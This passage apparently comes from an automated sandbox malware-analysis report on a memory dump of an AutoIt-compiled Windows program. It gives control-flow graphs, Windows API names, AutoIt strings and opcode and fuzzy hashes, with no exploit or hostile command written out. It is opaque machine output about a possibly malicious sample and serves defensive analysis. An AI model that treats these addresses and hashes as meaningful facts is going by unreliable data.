7ff73d08ad83 806->812 815 7ff73d08ad88-7ff73d08ad97 call 7ff73d0c41ac 812->815 820 7ff73d08ad99 815->820 819->797 823 7ff73d043be0-7ff73d043bea 819->823 824 7ff73d08ad9e-7ff73d08adad call 7ff73d0c41ac 820->824 823->806 825 7ff73d043bf0-7ff73d043c06 call 7ff73d047590 823->825 830 7ff73d08adaf 824->830 831 7ff73d043d1e-7ff73d043d23 call 7ff73d065164 825->831 832 7ff73d043c0c-7ff73d043c16 825->832 830->830 831->711 834 7ff73d043c88-7ff73d043ca7 call 7ff73d047590 call 7ff73d065164 832->834 835 7ff73d043c18-7ff73d043c22 832->835 845 7ff73d043ca9 834->845 835->815 838 7ff73d043c28-7ff73d043c39 835->838 838->824 840 7ff73d043c3f-7ff73d043d6d call 7ff73d047590 * 3 call 7ff73d043e0c call 7ff73d043d88 838->840 855 7ff73d08adb4-7ff73d08adc3 call 7ff73d0ce85c 840->855 856 7ff73d043d73-7ff73d043d84 840->856 845->835 859 7ff73d08adc5 855->859 859->859
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                                                                                                      • String ID: close all
                                                                                                                                                                      • API String ID: 1992507300-3243417748
                                                                                                                                                                      • Opcode ID: 138d970bcafbcf0fce3962cf9bcb081ba53b453e27770a172e93d5712241f3c4
                                                                                                                                                                      • Instruction ID: fd3e7eb6ce8d22ec8fc10fa845ad7c18b065c7e2dc36ae45c9c381a6c19ddaa5
                                                                                                                                                                      • Opcode Fuzzy Hash: 138d970bcafbcf0fce3962cf9bcb081ba53b453e27770a172e93d5712241f3c4
                                                                                                                                                                      • Instruction Fuzzy Hash: B9D16421B4EA0AA1EE58FB96C55467CA360FF84F44FD45431CB0E57691EF3CD862AB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                      • String ID: AutoIt v3
                                                                                                                                                                      • API String ID: 423443420-1704141276
                                                                                                                                                                      • Opcode ID: 61cfe2bd7aabbd649a034968b1568ef5e38b920e78fef4c73728b9a9439642cb
                                                                                                                                                                      • Instruction ID: e3155c6b03eff26b4cf5ea369c10ad871166c66678312a4ab1ae663b6b69fe6a
                                                                                                                                                                      • Opcode Fuzzy Hash: 61cfe2bd7aabbd649a034968b1568ef5e38b920e78fef4c73728b9a9439642cb
                                                                                                                                                                      • Instruction Fuzzy Hash: 18311A36A09B0AE6E740EB91F8443A9B374FB84B58F910135C94D13B58EFBE9098D760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 863 7ff73d0878d8-7ff73d08794a call 7ff73d087608 866 7ff73d08794c-7ff73d087954 call 7ff73d07b714 863->866 867 7ff73d087963-7ff73d08796d call 7ff73d07e9a8 863->867 872 7ff73d087957-7ff73d08795e call 7ff73d07b734 866->872 873 7ff73d087987-7ff73d0879f3 CreateFileW 867->873 874 7ff73d08796f-7ff73d087985 call 7ff73d07b714 call 7ff73d07b734 867->874 886 7ff73d087caa-7ff73d087cc6 872->886 877 7ff73d087a7b-7ff73d087a86 GetFileType 873->877 878 7ff73d0879f9-7ff73d087a00 873->878 874->872 880 7ff73d087ad9-7ff73d087adf 877->880 881 7ff73d087a88-7ff73d087ac3 GetLastError call 7ff73d07b6c4 CloseHandle 877->881 883 7ff73d087a48-7ff73d087a76 GetLastError call 7ff73d07b6c4 878->883 884 7ff73d087a02-7ff73d087a06 878->884 889 7ff73d087ae6-7ff73d087ae9 880->889 890 7ff73d087ae1-7ff73d087ae4 880->890 881->872 897 7ff73d087ac9-7ff73d087ad4 call 7ff73d07b734 881->897 883->872 884->883 891 7ff73d087a08-7ff73d087a46 CreateFileW 884->891 895 7ff73d087aee-7ff73d087b3c call 7ff73d07e8c4 889->895 896 7ff73d087aeb 889->896 890->895 891->877 891->883 901 7ff73d087b3e-7ff73d087b4a call 7ff73d087814 895->901 902 7ff73d087b50-7ff73d087b7a call 7ff73d087374 895->902 896->895 897->872 908 7ff73d087b4c 901->908 909 7ff73d087b7f-7ff73d087b89 call 7ff73d080a48 901->909 910 7ff73d087b8e-7ff73d087bd3 902->910 911 7ff73d087b7c 902->911 908->902 909->886 913 7ff73d087bf5-7ff73d087c01 910->913 914 7ff73d087bd5-7ff73d087bd9 910->914 911->909 915 7ff73d087ca8 913->915 916 7ff73d087c07-7ff73d087c0b 913->916 914->913 918 7ff73d087bdb-7ff73d087bf0 914->918 915->886 916->915 919 7ff73d087c11-7ff73d087c59 CloseHandle CreateFileW 916->919 918->913 920 7ff73d087c8e-7ff73d087ca3 919->920 921 7ff73d087c5b-7ff73d087c89 GetLastError call 7ff73d07b6c4 call 7ff73d07ead8 919->921 920->915 921->920
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1617910340-0
                                                                                                                                                                      • Opcode ID: bd0683d3a3ba299cfcf06e253b2931ac07f180c7c64e43b398f25206f3f08552
                                                                                                                                                                      • Instruction ID: 0af9d0422dec4cbe9ac3ef77d0a2d9cd48cdfd9168a99b6bcdc0b0478951d0d8
                                                                                                                                                                      • Opcode Fuzzy Hash: bd0683d3a3ba299cfcf06e253b2931ac07f180c7c64e43b398f25206f3f08552
                                                                                                                                                                      • Instruction Fuzzy Hash: 9BC1E233B18A599AEB10DFA4D4813AC7761EB89B98F441235CE2E5B7D8EF38E411D310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 926 7ff73d0505a5-7ff73d05060d 930 7ff73d05084e-7ff73d05087f 926->930 931 7ff73d050613-7ff73d05064c 926->931 933 7ff73d050650-7ff73d050657 931->933 934 7ff73d05065d-7ff73d050671 933->934 935 7ff73d050826-7ff73d050846 933->935 937 7ff73d09b7c2-7ff73d09b7c9 934->937 938 7ff73d050677-7ff73d05068c 934->938 935->930 941 7ff73d09b7cf 937->941 942 7ff73d0506d2-7ff73d0506f3 937->942 939 7ff73d050998-7ff73d0509bb PeekMessageW 938->939 940 7ff73d050692-7ff73d050699 938->940 945 7ff73d0506b8-7ff73d0506bf 939->945 946 7ff73d0509c1-7ff73d0509c5 939->946 940->939 943 7ff73d05069f-7ff73d0506a4 940->943 951 7ff73d09b7d4-7ff73d09b7da 941->951 955 7ff73d05073e-7ff73d0507a2 942->955 956 7ff73d0506f5-7ff73d0506fc 942->956 943->939 947 7ff73d0506aa-7ff73d0506b2 GetInputState 943->947 948 7ff73d0506c5-7ff73d0506cc 945->948 949 7ff73d09c95d-7ff73d09c96b 945->949 952 7ff73d0509cb-7ff73d0509d5 946->952 953 7ff73d09b824-7ff73d09b835 946->953 947->939 947->945 948->942 954 7ff73d09c975-7ff73d09c98d call 7ff73d04410c 948->954 949->954 957 7ff73d09b815 951->957 958 7ff73d09b7dc-7ff73d09b7f0 951->958 952->951 959 7ff73d0509db-7ff73d0509ed call 7ff73d063fb4 952->959 953->945 954->935 995 7ff73d0507a8-7ff73d0507aa 955->995 996 7ff73d09c94e 955->996 956->955 961 7ff73d0506fe-7ff73d050708 956->961 957->953 958->957 962 7ff73d09b7f2-7ff73d09b7f9 958->962 974 7ff73d050a03-7ff73d050a1f PeekMessageW 959->974 975 7ff73d0509ef-7ff73d0509fd TranslateMessage DispatchMessageA 959->975 966 7ff73d05070f-7ff73d050712 961->966 962->957 967 7ff73d09b7fb-7ff73d09b80a TranslateAcceleratorW 962->967 971 7ff73d050718 966->971 972 7ff73d050880-7ff73d050887 966->972 967->959 973 7ff73d09b810 967->973 978 7ff73d05071f-7ff73d050722 971->978 979 7ff73d0508bb-7ff73d0508bf 972->979 980 7ff73d050889-7ff73d05089c timeGetTime 972->980 973->974 974->945 976 7ff73d050a25 974->976 975->974 976->946 984 7ff73d050728-7ff73d050731 978->984 985 7ff73d0508c4-7ff73d0508cb 978->985 979->966 981 7ff73d09b925-7ff73d09b92a 980->981 982 7ff73d0508a2-7ff73d0508a7 980->982 986 7ff73d09b930 981->986 987 7ff73d0508ac-7ff73d0508b5 981->987 982->987 988 7ff73d0508a9 982->988 992 7ff73d09bb41-7ff73d09bb48 984->992 993 7ff73d050737 984->993 990 7ff73d09b972-7ff73d09b97d 985->990 991 7ff73d0508d1-7ff73d0508d5 985->991 994 7ff73d09b935-7ff73d09b96d timeGetTime call 7ff73d0630e0 call 7ff73d0c4a8c 986->994 987->979 987->994 988->987 997 7ff73d09b97f 990->997 998 7ff73d09b983-7ff73d09b986 990->998 991->978 993->955 994->979 995->996 1000 7ff73d0507b0-7ff73d0507be 995->1000 996->949 997->998 1001 7ff73d09b988 998->1001 1002 7ff73d09b98c-7ff73d09b993 998->1002 1000->996 1004 7ff73d0507c4-7ff73d0507e9 1000->1004 1001->1002 1005 7ff73d09b995 1002->1005 1006 7ff73d09b99c-7ff73d09b9a3 1002->1006 1008 7ff73d0508da-7ff73d0508dd 1004->1008 1009 7ff73d0507ef-7ff73d0507f9 call 7ff73d050b40 1004->1009 1005->1006 1010 7ff73d09b9a5 1006->1010 1011 7ff73d09b9ac-7ff73d09b9b7 call 7ff73d064a58 1006->1011 1014 7ff73d0508df-7ff73d0508e5 call 7ff73d050e00 1008->1014 1015 7ff73d050901-7ff73d050903 1008->1015 1021 7ff73d0507fe-7ff73d050806 1009->1021 1010->1011 1011->971 1024 7ff73d0508ea 1014->1024 1019 7ff73d050905-7ff73d050919 call 7ff73d054840 1015->1019 1020 7ff73d050941-7ff73d050944 1015->1020 1033 7ff73d05091e-7ff73d050920 1019->1033 1022 7ff73d09c696-7ff73d09c698 1020->1022 1023 7ff73d05094a-7ff73d05096c call 7ff73d04e630 1020->1023 1026 7ff73d05080c 1021->1026 1027 7ff73d05096e-7ff73d05097b 1021->1027 1029 7ff73d09c6c5-7ff73d09c6ce 1022->1029 1030 7ff73d09c69a-7ff73d09c69d 1022->1030 1023->1033 1024->1021 1034 7ff73d050810-7ff73d050813 1026->1034 1031 7ff73d09c859-7ff73d09c86f call 7ff73d065164 * 2 1027->1031 1032 7ff73d050981-7ff73d05098e call 7ff73d065164 1027->1032 1039 7ff73d09c6d0-7ff73d09c6db 1029->1039 1040 7ff73d09c6dd-7ff73d09c6e4 1029->1040 1030->1034 1037 7ff73d09c6a3-7ff73d09c6bf call 7ff73d051c90 1030->1037 1031->996 1032->939 1033->1021 1041 7ff73d050926-7ff73d050936 1033->1041 1042 7ff73d050ae7-7ff73d050aed 1034->1042 1043 7ff73d050819-7ff73d050820 1034->1043 1037->1029 1048 7ff73d09c6e7-7ff73d09c6ee call 7ff73d0d9cc4 1039->1048 1040->1048 1041->1021 1049 7ff73d05093c 1041->1049 1042->1043 1044 7ff73d050af3-7ff73d050afd 1042->1044 1043->933 1043->935 1044->937 1057 7ff73d09c7af-7ff73d09c7b1 1048->1057 1058 7ff73d09c6f4-7ff73d09c70e call 7ff73d0c44e8 1048->1058 1050 7ff73d09c7cc-7ff73d09c7e6 call 7ff73d0c44e8 1049->1050 1063 7ff73d09c81f-7ff73d09c826 1050->1063 1064 7ff73d09c7e8-7ff73d09c7f5 1050->1064 1060 7ff73d09c7b3 1057->1060 1061 7ff73d09c7b7-7ff73d09c7c6 call 7ff73d0db44c 1057->1061 1072 7ff73d09c710-7ff73d09c71d 1058->1072 1073 7ff73d09c747-7ff73d09c74e 1058->1073 1060->1061 1061->1050 1063->1043 1065 7ff73d09c82c-7ff73d09c832 1063->1065 1068 7ff73d09c7f7-7ff73d09c808 call 7ff73d065164 * 2 1064->1068 1069 7ff73d09c80d-7ff73d09c81a call 7ff73d065164 1064->1069 1065->1043 1070 7ff73d09c838-7ff73d09c841 1065->1070 1068->1069 1069->1063 1070->1031 1076 7ff73d09c71f-7ff73d09c730 call 7ff73d065164 * 2 1072->1076 1077 7ff73d09c735-7ff73d09c742 call 7ff73d065164 1072->1077 1073->1043 1079 7ff73d09c754-7ff73d09c75a 1073->1079 1076->1077 1077->1073 1079->1043 1084 7ff73d09c760-7ff73d09c769 1079->1084 1084->1057
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3249950245-0
                                                                                                                                                                      • Opcode ID: 566ba4177f0000d8c12a605407bc73385d66e257620743a6dc756e6c99c6913b
                                                                                                                                                                      • Instruction ID: e3e9772880a9bab266dd1b0688ccd3969323b1952218ae08b1603571d62219e9
                                                                                                                                                                      • Opcode Fuzzy Hash: 566ba4177f0000d8c12a605407bc73385d66e257620743a6dc756e6c99c6913b
                                                                                                                                                                      • Instruction Fuzzy Hash: 8512D672E0C68AA6FB64ABA0E4543BDB7A1EB41F44F944035DA8D07694EF7CE450E720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1088 7ff73d08114c-7ff73d081172 1089 7ff73d08118d-7ff73d081191 1088->1089 1090 7ff73d081174-7ff73d081188 call 7ff73d07b714 call 7ff73d07b734 1088->1090 1092 7ff73d081197-7ff73d08119e 1089->1092 1093 7ff73d08157f-7ff73d08158b call 7ff73d07b714 call 7ff73d07b734 1089->1093 1108 7ff73d081596 1090->1108 1092->1093 1095 7ff73d0811a4-7ff73d0811d3 1092->1095 1110 7ff73d081591 call 7ff73d07b614 1093->1110 1095->1093 1099 7ff73d0811d9-7ff73d0811e0 1095->1099 1100 7ff73d0811f9-7ff73d0811fc 1099->1100 1101 7ff73d0811e2-7ff73d0811f4 call 7ff73d07b714 call 7ff73d07b734 1099->1101 1106 7ff73d08157b-7ff73d08157d 1100->1106 1107 7ff73d081202-7ff73d081207 1100->1107 1101->1110 1111 7ff73d081599-7ff73d0815b0 1106->1111 1107->1106 1112 7ff73d08120d-7ff73d081210 1107->1112 1108->1111 1110->1108 1112->1101 1115 7ff73d081212-7ff73d081238 1112->1115 1117 7ff73d08123a-7ff73d08123d 1115->1117 1118 7ff73d081254-7ff73d08125c 1115->1118 1119 7ff73d081249-7ff73d08124f 1117->1119 1120 7ff73d08123f-7ff73d081247 1117->1120 1121 7ff73d08125e-7ff73d081275 call 7ff73d07b714 call 7ff73d07b734 call 7ff73d07b614 1118->1121 1122 7ff73d08127a-7ff73d0812a6 call 7ff73d07caac call 7ff73d07b950 * 2 1118->1122 1124 7ff73d0812f4-7ff73d08130a 1119->1124 1120->1119 1120->1121 1149 7ff73d081400 1121->1149 1151 7ff73d0812a8-7ff73d0812be call 7ff73d07b734 call 7ff73d07b714 1122->1151 1152 7ff73d0812c3-7ff73d0812ef call 7ff73d0818f8 1122->1152 1126 7ff73d08130c-7ff73d081313 1124->1126 1127 7ff73d081389-7ff73d081393 call 7ff73d086b98 1124->1127 1126->1127 1131 7ff73d081315-7ff73d081318 1126->1131 1138 7ff73d08141e 1127->1138 1139 7ff73d081399-7ff73d0813ae 1127->1139 1131->1127 1135 7ff73d08131a-7ff73d081332 1131->1135 1135->1127 1141 7ff73d081334-7ff73d08133f 1135->1141 1147 7ff73d081423-7ff73d081443 ReadFile 1138->1147 1139->1138 1143 7ff73d0813b0-7ff73d0813c2 GetConsoleMode 1139->1143 1141->1127 1145 7ff73d081341-7ff73d081344 1141->1145 1143->1138 1148 7ff73d0813c4-7ff73d0813cc 1143->1148 1145->1127 1150 7ff73d081346-7ff73d08135f 1145->1150 1153 7ff73d081449-7ff73d081451 1147->1153 1154 7ff73d081545-7ff73d08154e GetLastError 1147->1154 1148->1147 1156 7ff73d0813ce-7ff73d0813f1 ReadConsoleW 1148->1156 1159 7ff73d081403-7ff73d08140d call 7ff73d07b950 1149->1159 1150->1127 1160 7ff73d081361-7ff73d08136c 1150->1160 1151->1149 1152->1124 1153->1154 1162 7ff73d081457 1153->1162 1157 7ff73d08156b-7ff73d08156e 1154->1157 1158 7ff73d081550-7ff73d081566 call 7ff73d07b734 call 7ff73d07b714 1154->1158 1165 7ff73d0813f3 GetLastError 1156->1165 1166 7ff73d081412-7ff73d08141c 1156->1166 1170 7ff73d0813f9-7ff73d0813fb call 7ff73d07b6c4 1157->1170 1171 7ff73d081574-7ff73d081576 1157->1171 1158->1149 1159->1111 1160->1127 1169 7ff73d08136e-7ff73d081371 1160->1169 1163 7ff73d08145e-7ff73d081473 1162->1163 1163->1159 1173 7ff73d081475-7ff73d08147d 1163->1173 1165->1170 1166->1163 1169->1127 1177 7ff73d081373-7ff73d081384 1169->1177 1170->1149 1171->1159 1179 7ff73d0814a7-7ff73d0814ae 1173->1179 1180 7ff73d08147f-7ff73d08149b call 7ff73d080d34 1173->1180 1177->1127 1184 7ff73d08152d-7ff73d081540 call 7ff73d080b04 1179->1184 1185 7ff73d0814b0-7ff73d0814c8 1179->1185 1188 7ff73d0814a0-7ff73d0814a2 1180->1188 1184->1188 1189 7ff73d0814ca-7ff73d0814ce 1185->1189 1190 7ff73d081520-7ff73d081528 1185->1190 1188->1159 1192 7ff73d0814d3-7ff73d0814dc 1189->1192 1190->1159 1193 7ff73d0814de-7ff73d0814e3 1192->1193 1194 7ff73d081517-7ff73d08151b 1192->1194 1195 7ff73d0814e5-7ff73d0814e8 1193->1195 1196 7ff73d081500-7ff73d08150c 1193->1196 1194->1190 1195->1196 1197 7ff73d0814ea-7ff73d0814ed 1195->1197 1198 7ff73d081510-7ff73d081513 1196->1198 1197->1196 1199 7ff73d0814ef-7ff73d0814fe 1197->1199 1198->1192 1200 7ff73d081515 1198->1200 1199->1198 1200->1190
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 0954954c7d297e24944f813ad065bf1254021cef18a42e794a92f1f52167dbfe
                                                                                                                                                                      • Instruction ID: eeff522ec073adc633b165542e70409474d77f1968b173147a033cdd962c3628
                                                                                                                                                                      • Opcode Fuzzy Hash: 0954954c7d297e24944f813ad065bf1254021cef18a42e794a92f1f52167dbfe
                                                                                                                                                                      • Instruction Fuzzy Hash: 39C10562A0C68AA1EB61AF95D44027DAB91FF80F80FD50135EA4E077D5EF3CE445E722
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1237 7ff73d042ca0-7ff73d042d6c CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Create$Show
                                                                                                                                                                      • String ID: AutoIt v3$d$edit
                                                                                                                                                                      • API String ID: 2813641753-2600919596
                                                                                                                                                                      • Opcode ID: 3d6d6258cebddfd5ab976a1f69be8488d570fa555c953fe9476a3b583b71411a
                                                                                                                                                                      • Instruction ID: 76ed5243892c3381a1e077c35ee1105402b5a45c195d86eb9d71967360b06c58
                                                                                                                                                                      • Opcode Fuzzy Hash: 3d6d6258cebddfd5ab976a1f69be8488d570fa555c953fe9476a3b583b71411a
                                                                                                                                                                      • Instruction Fuzzy Hash: C1219332A1CF4697E750DF90F488369B3A1F788BA9F910138E64D46A54DFBED048CB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                                                                                                      • String ID: Line %d: $AutoIt -
                                                                                                                                                                      • API String ID: 3135491444-4094128768
                                                                                                                                                                      • Opcode ID: 2d11c3752225f5213f294d62c4563cd654303f0d41f515698f791c72b344c803
                                                                                                                                                                      • Instruction ID: 200d028aea8f589c3fb935d6c148e4a12786bea75f521b3ea236f58d98c3847a
                                                                                                                                                                      • Opcode Fuzzy Hash: 2d11c3752225f5213f294d62c4563cd654303f0d41f515698f791c72b344c803
                                                                                                                                                                      • Instruction Fuzzy Hash: 9B41A372A0CA9AB6E710FBA1E4445FAA361FB85B44FC00131E54C4759AFF7CE509DB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2117695475-0
                                                                                                                                                                      • Opcode ID: 850fa46355b92f9e0f53d10fb2a605fd89bcd8461486f5cb807cec1d16d7ac5b
                                                                                                                                                                      • Instruction ID: b958e99ef6abfb69385db27774fa303f25b7fd80bbf5eb2b77b6850187c1da62
                                                                                                                                                                      • Opcode Fuzzy Hash: 850fa46355b92f9e0f53d10fb2a605fd89bcd8461486f5cb807cec1d16d7ac5b
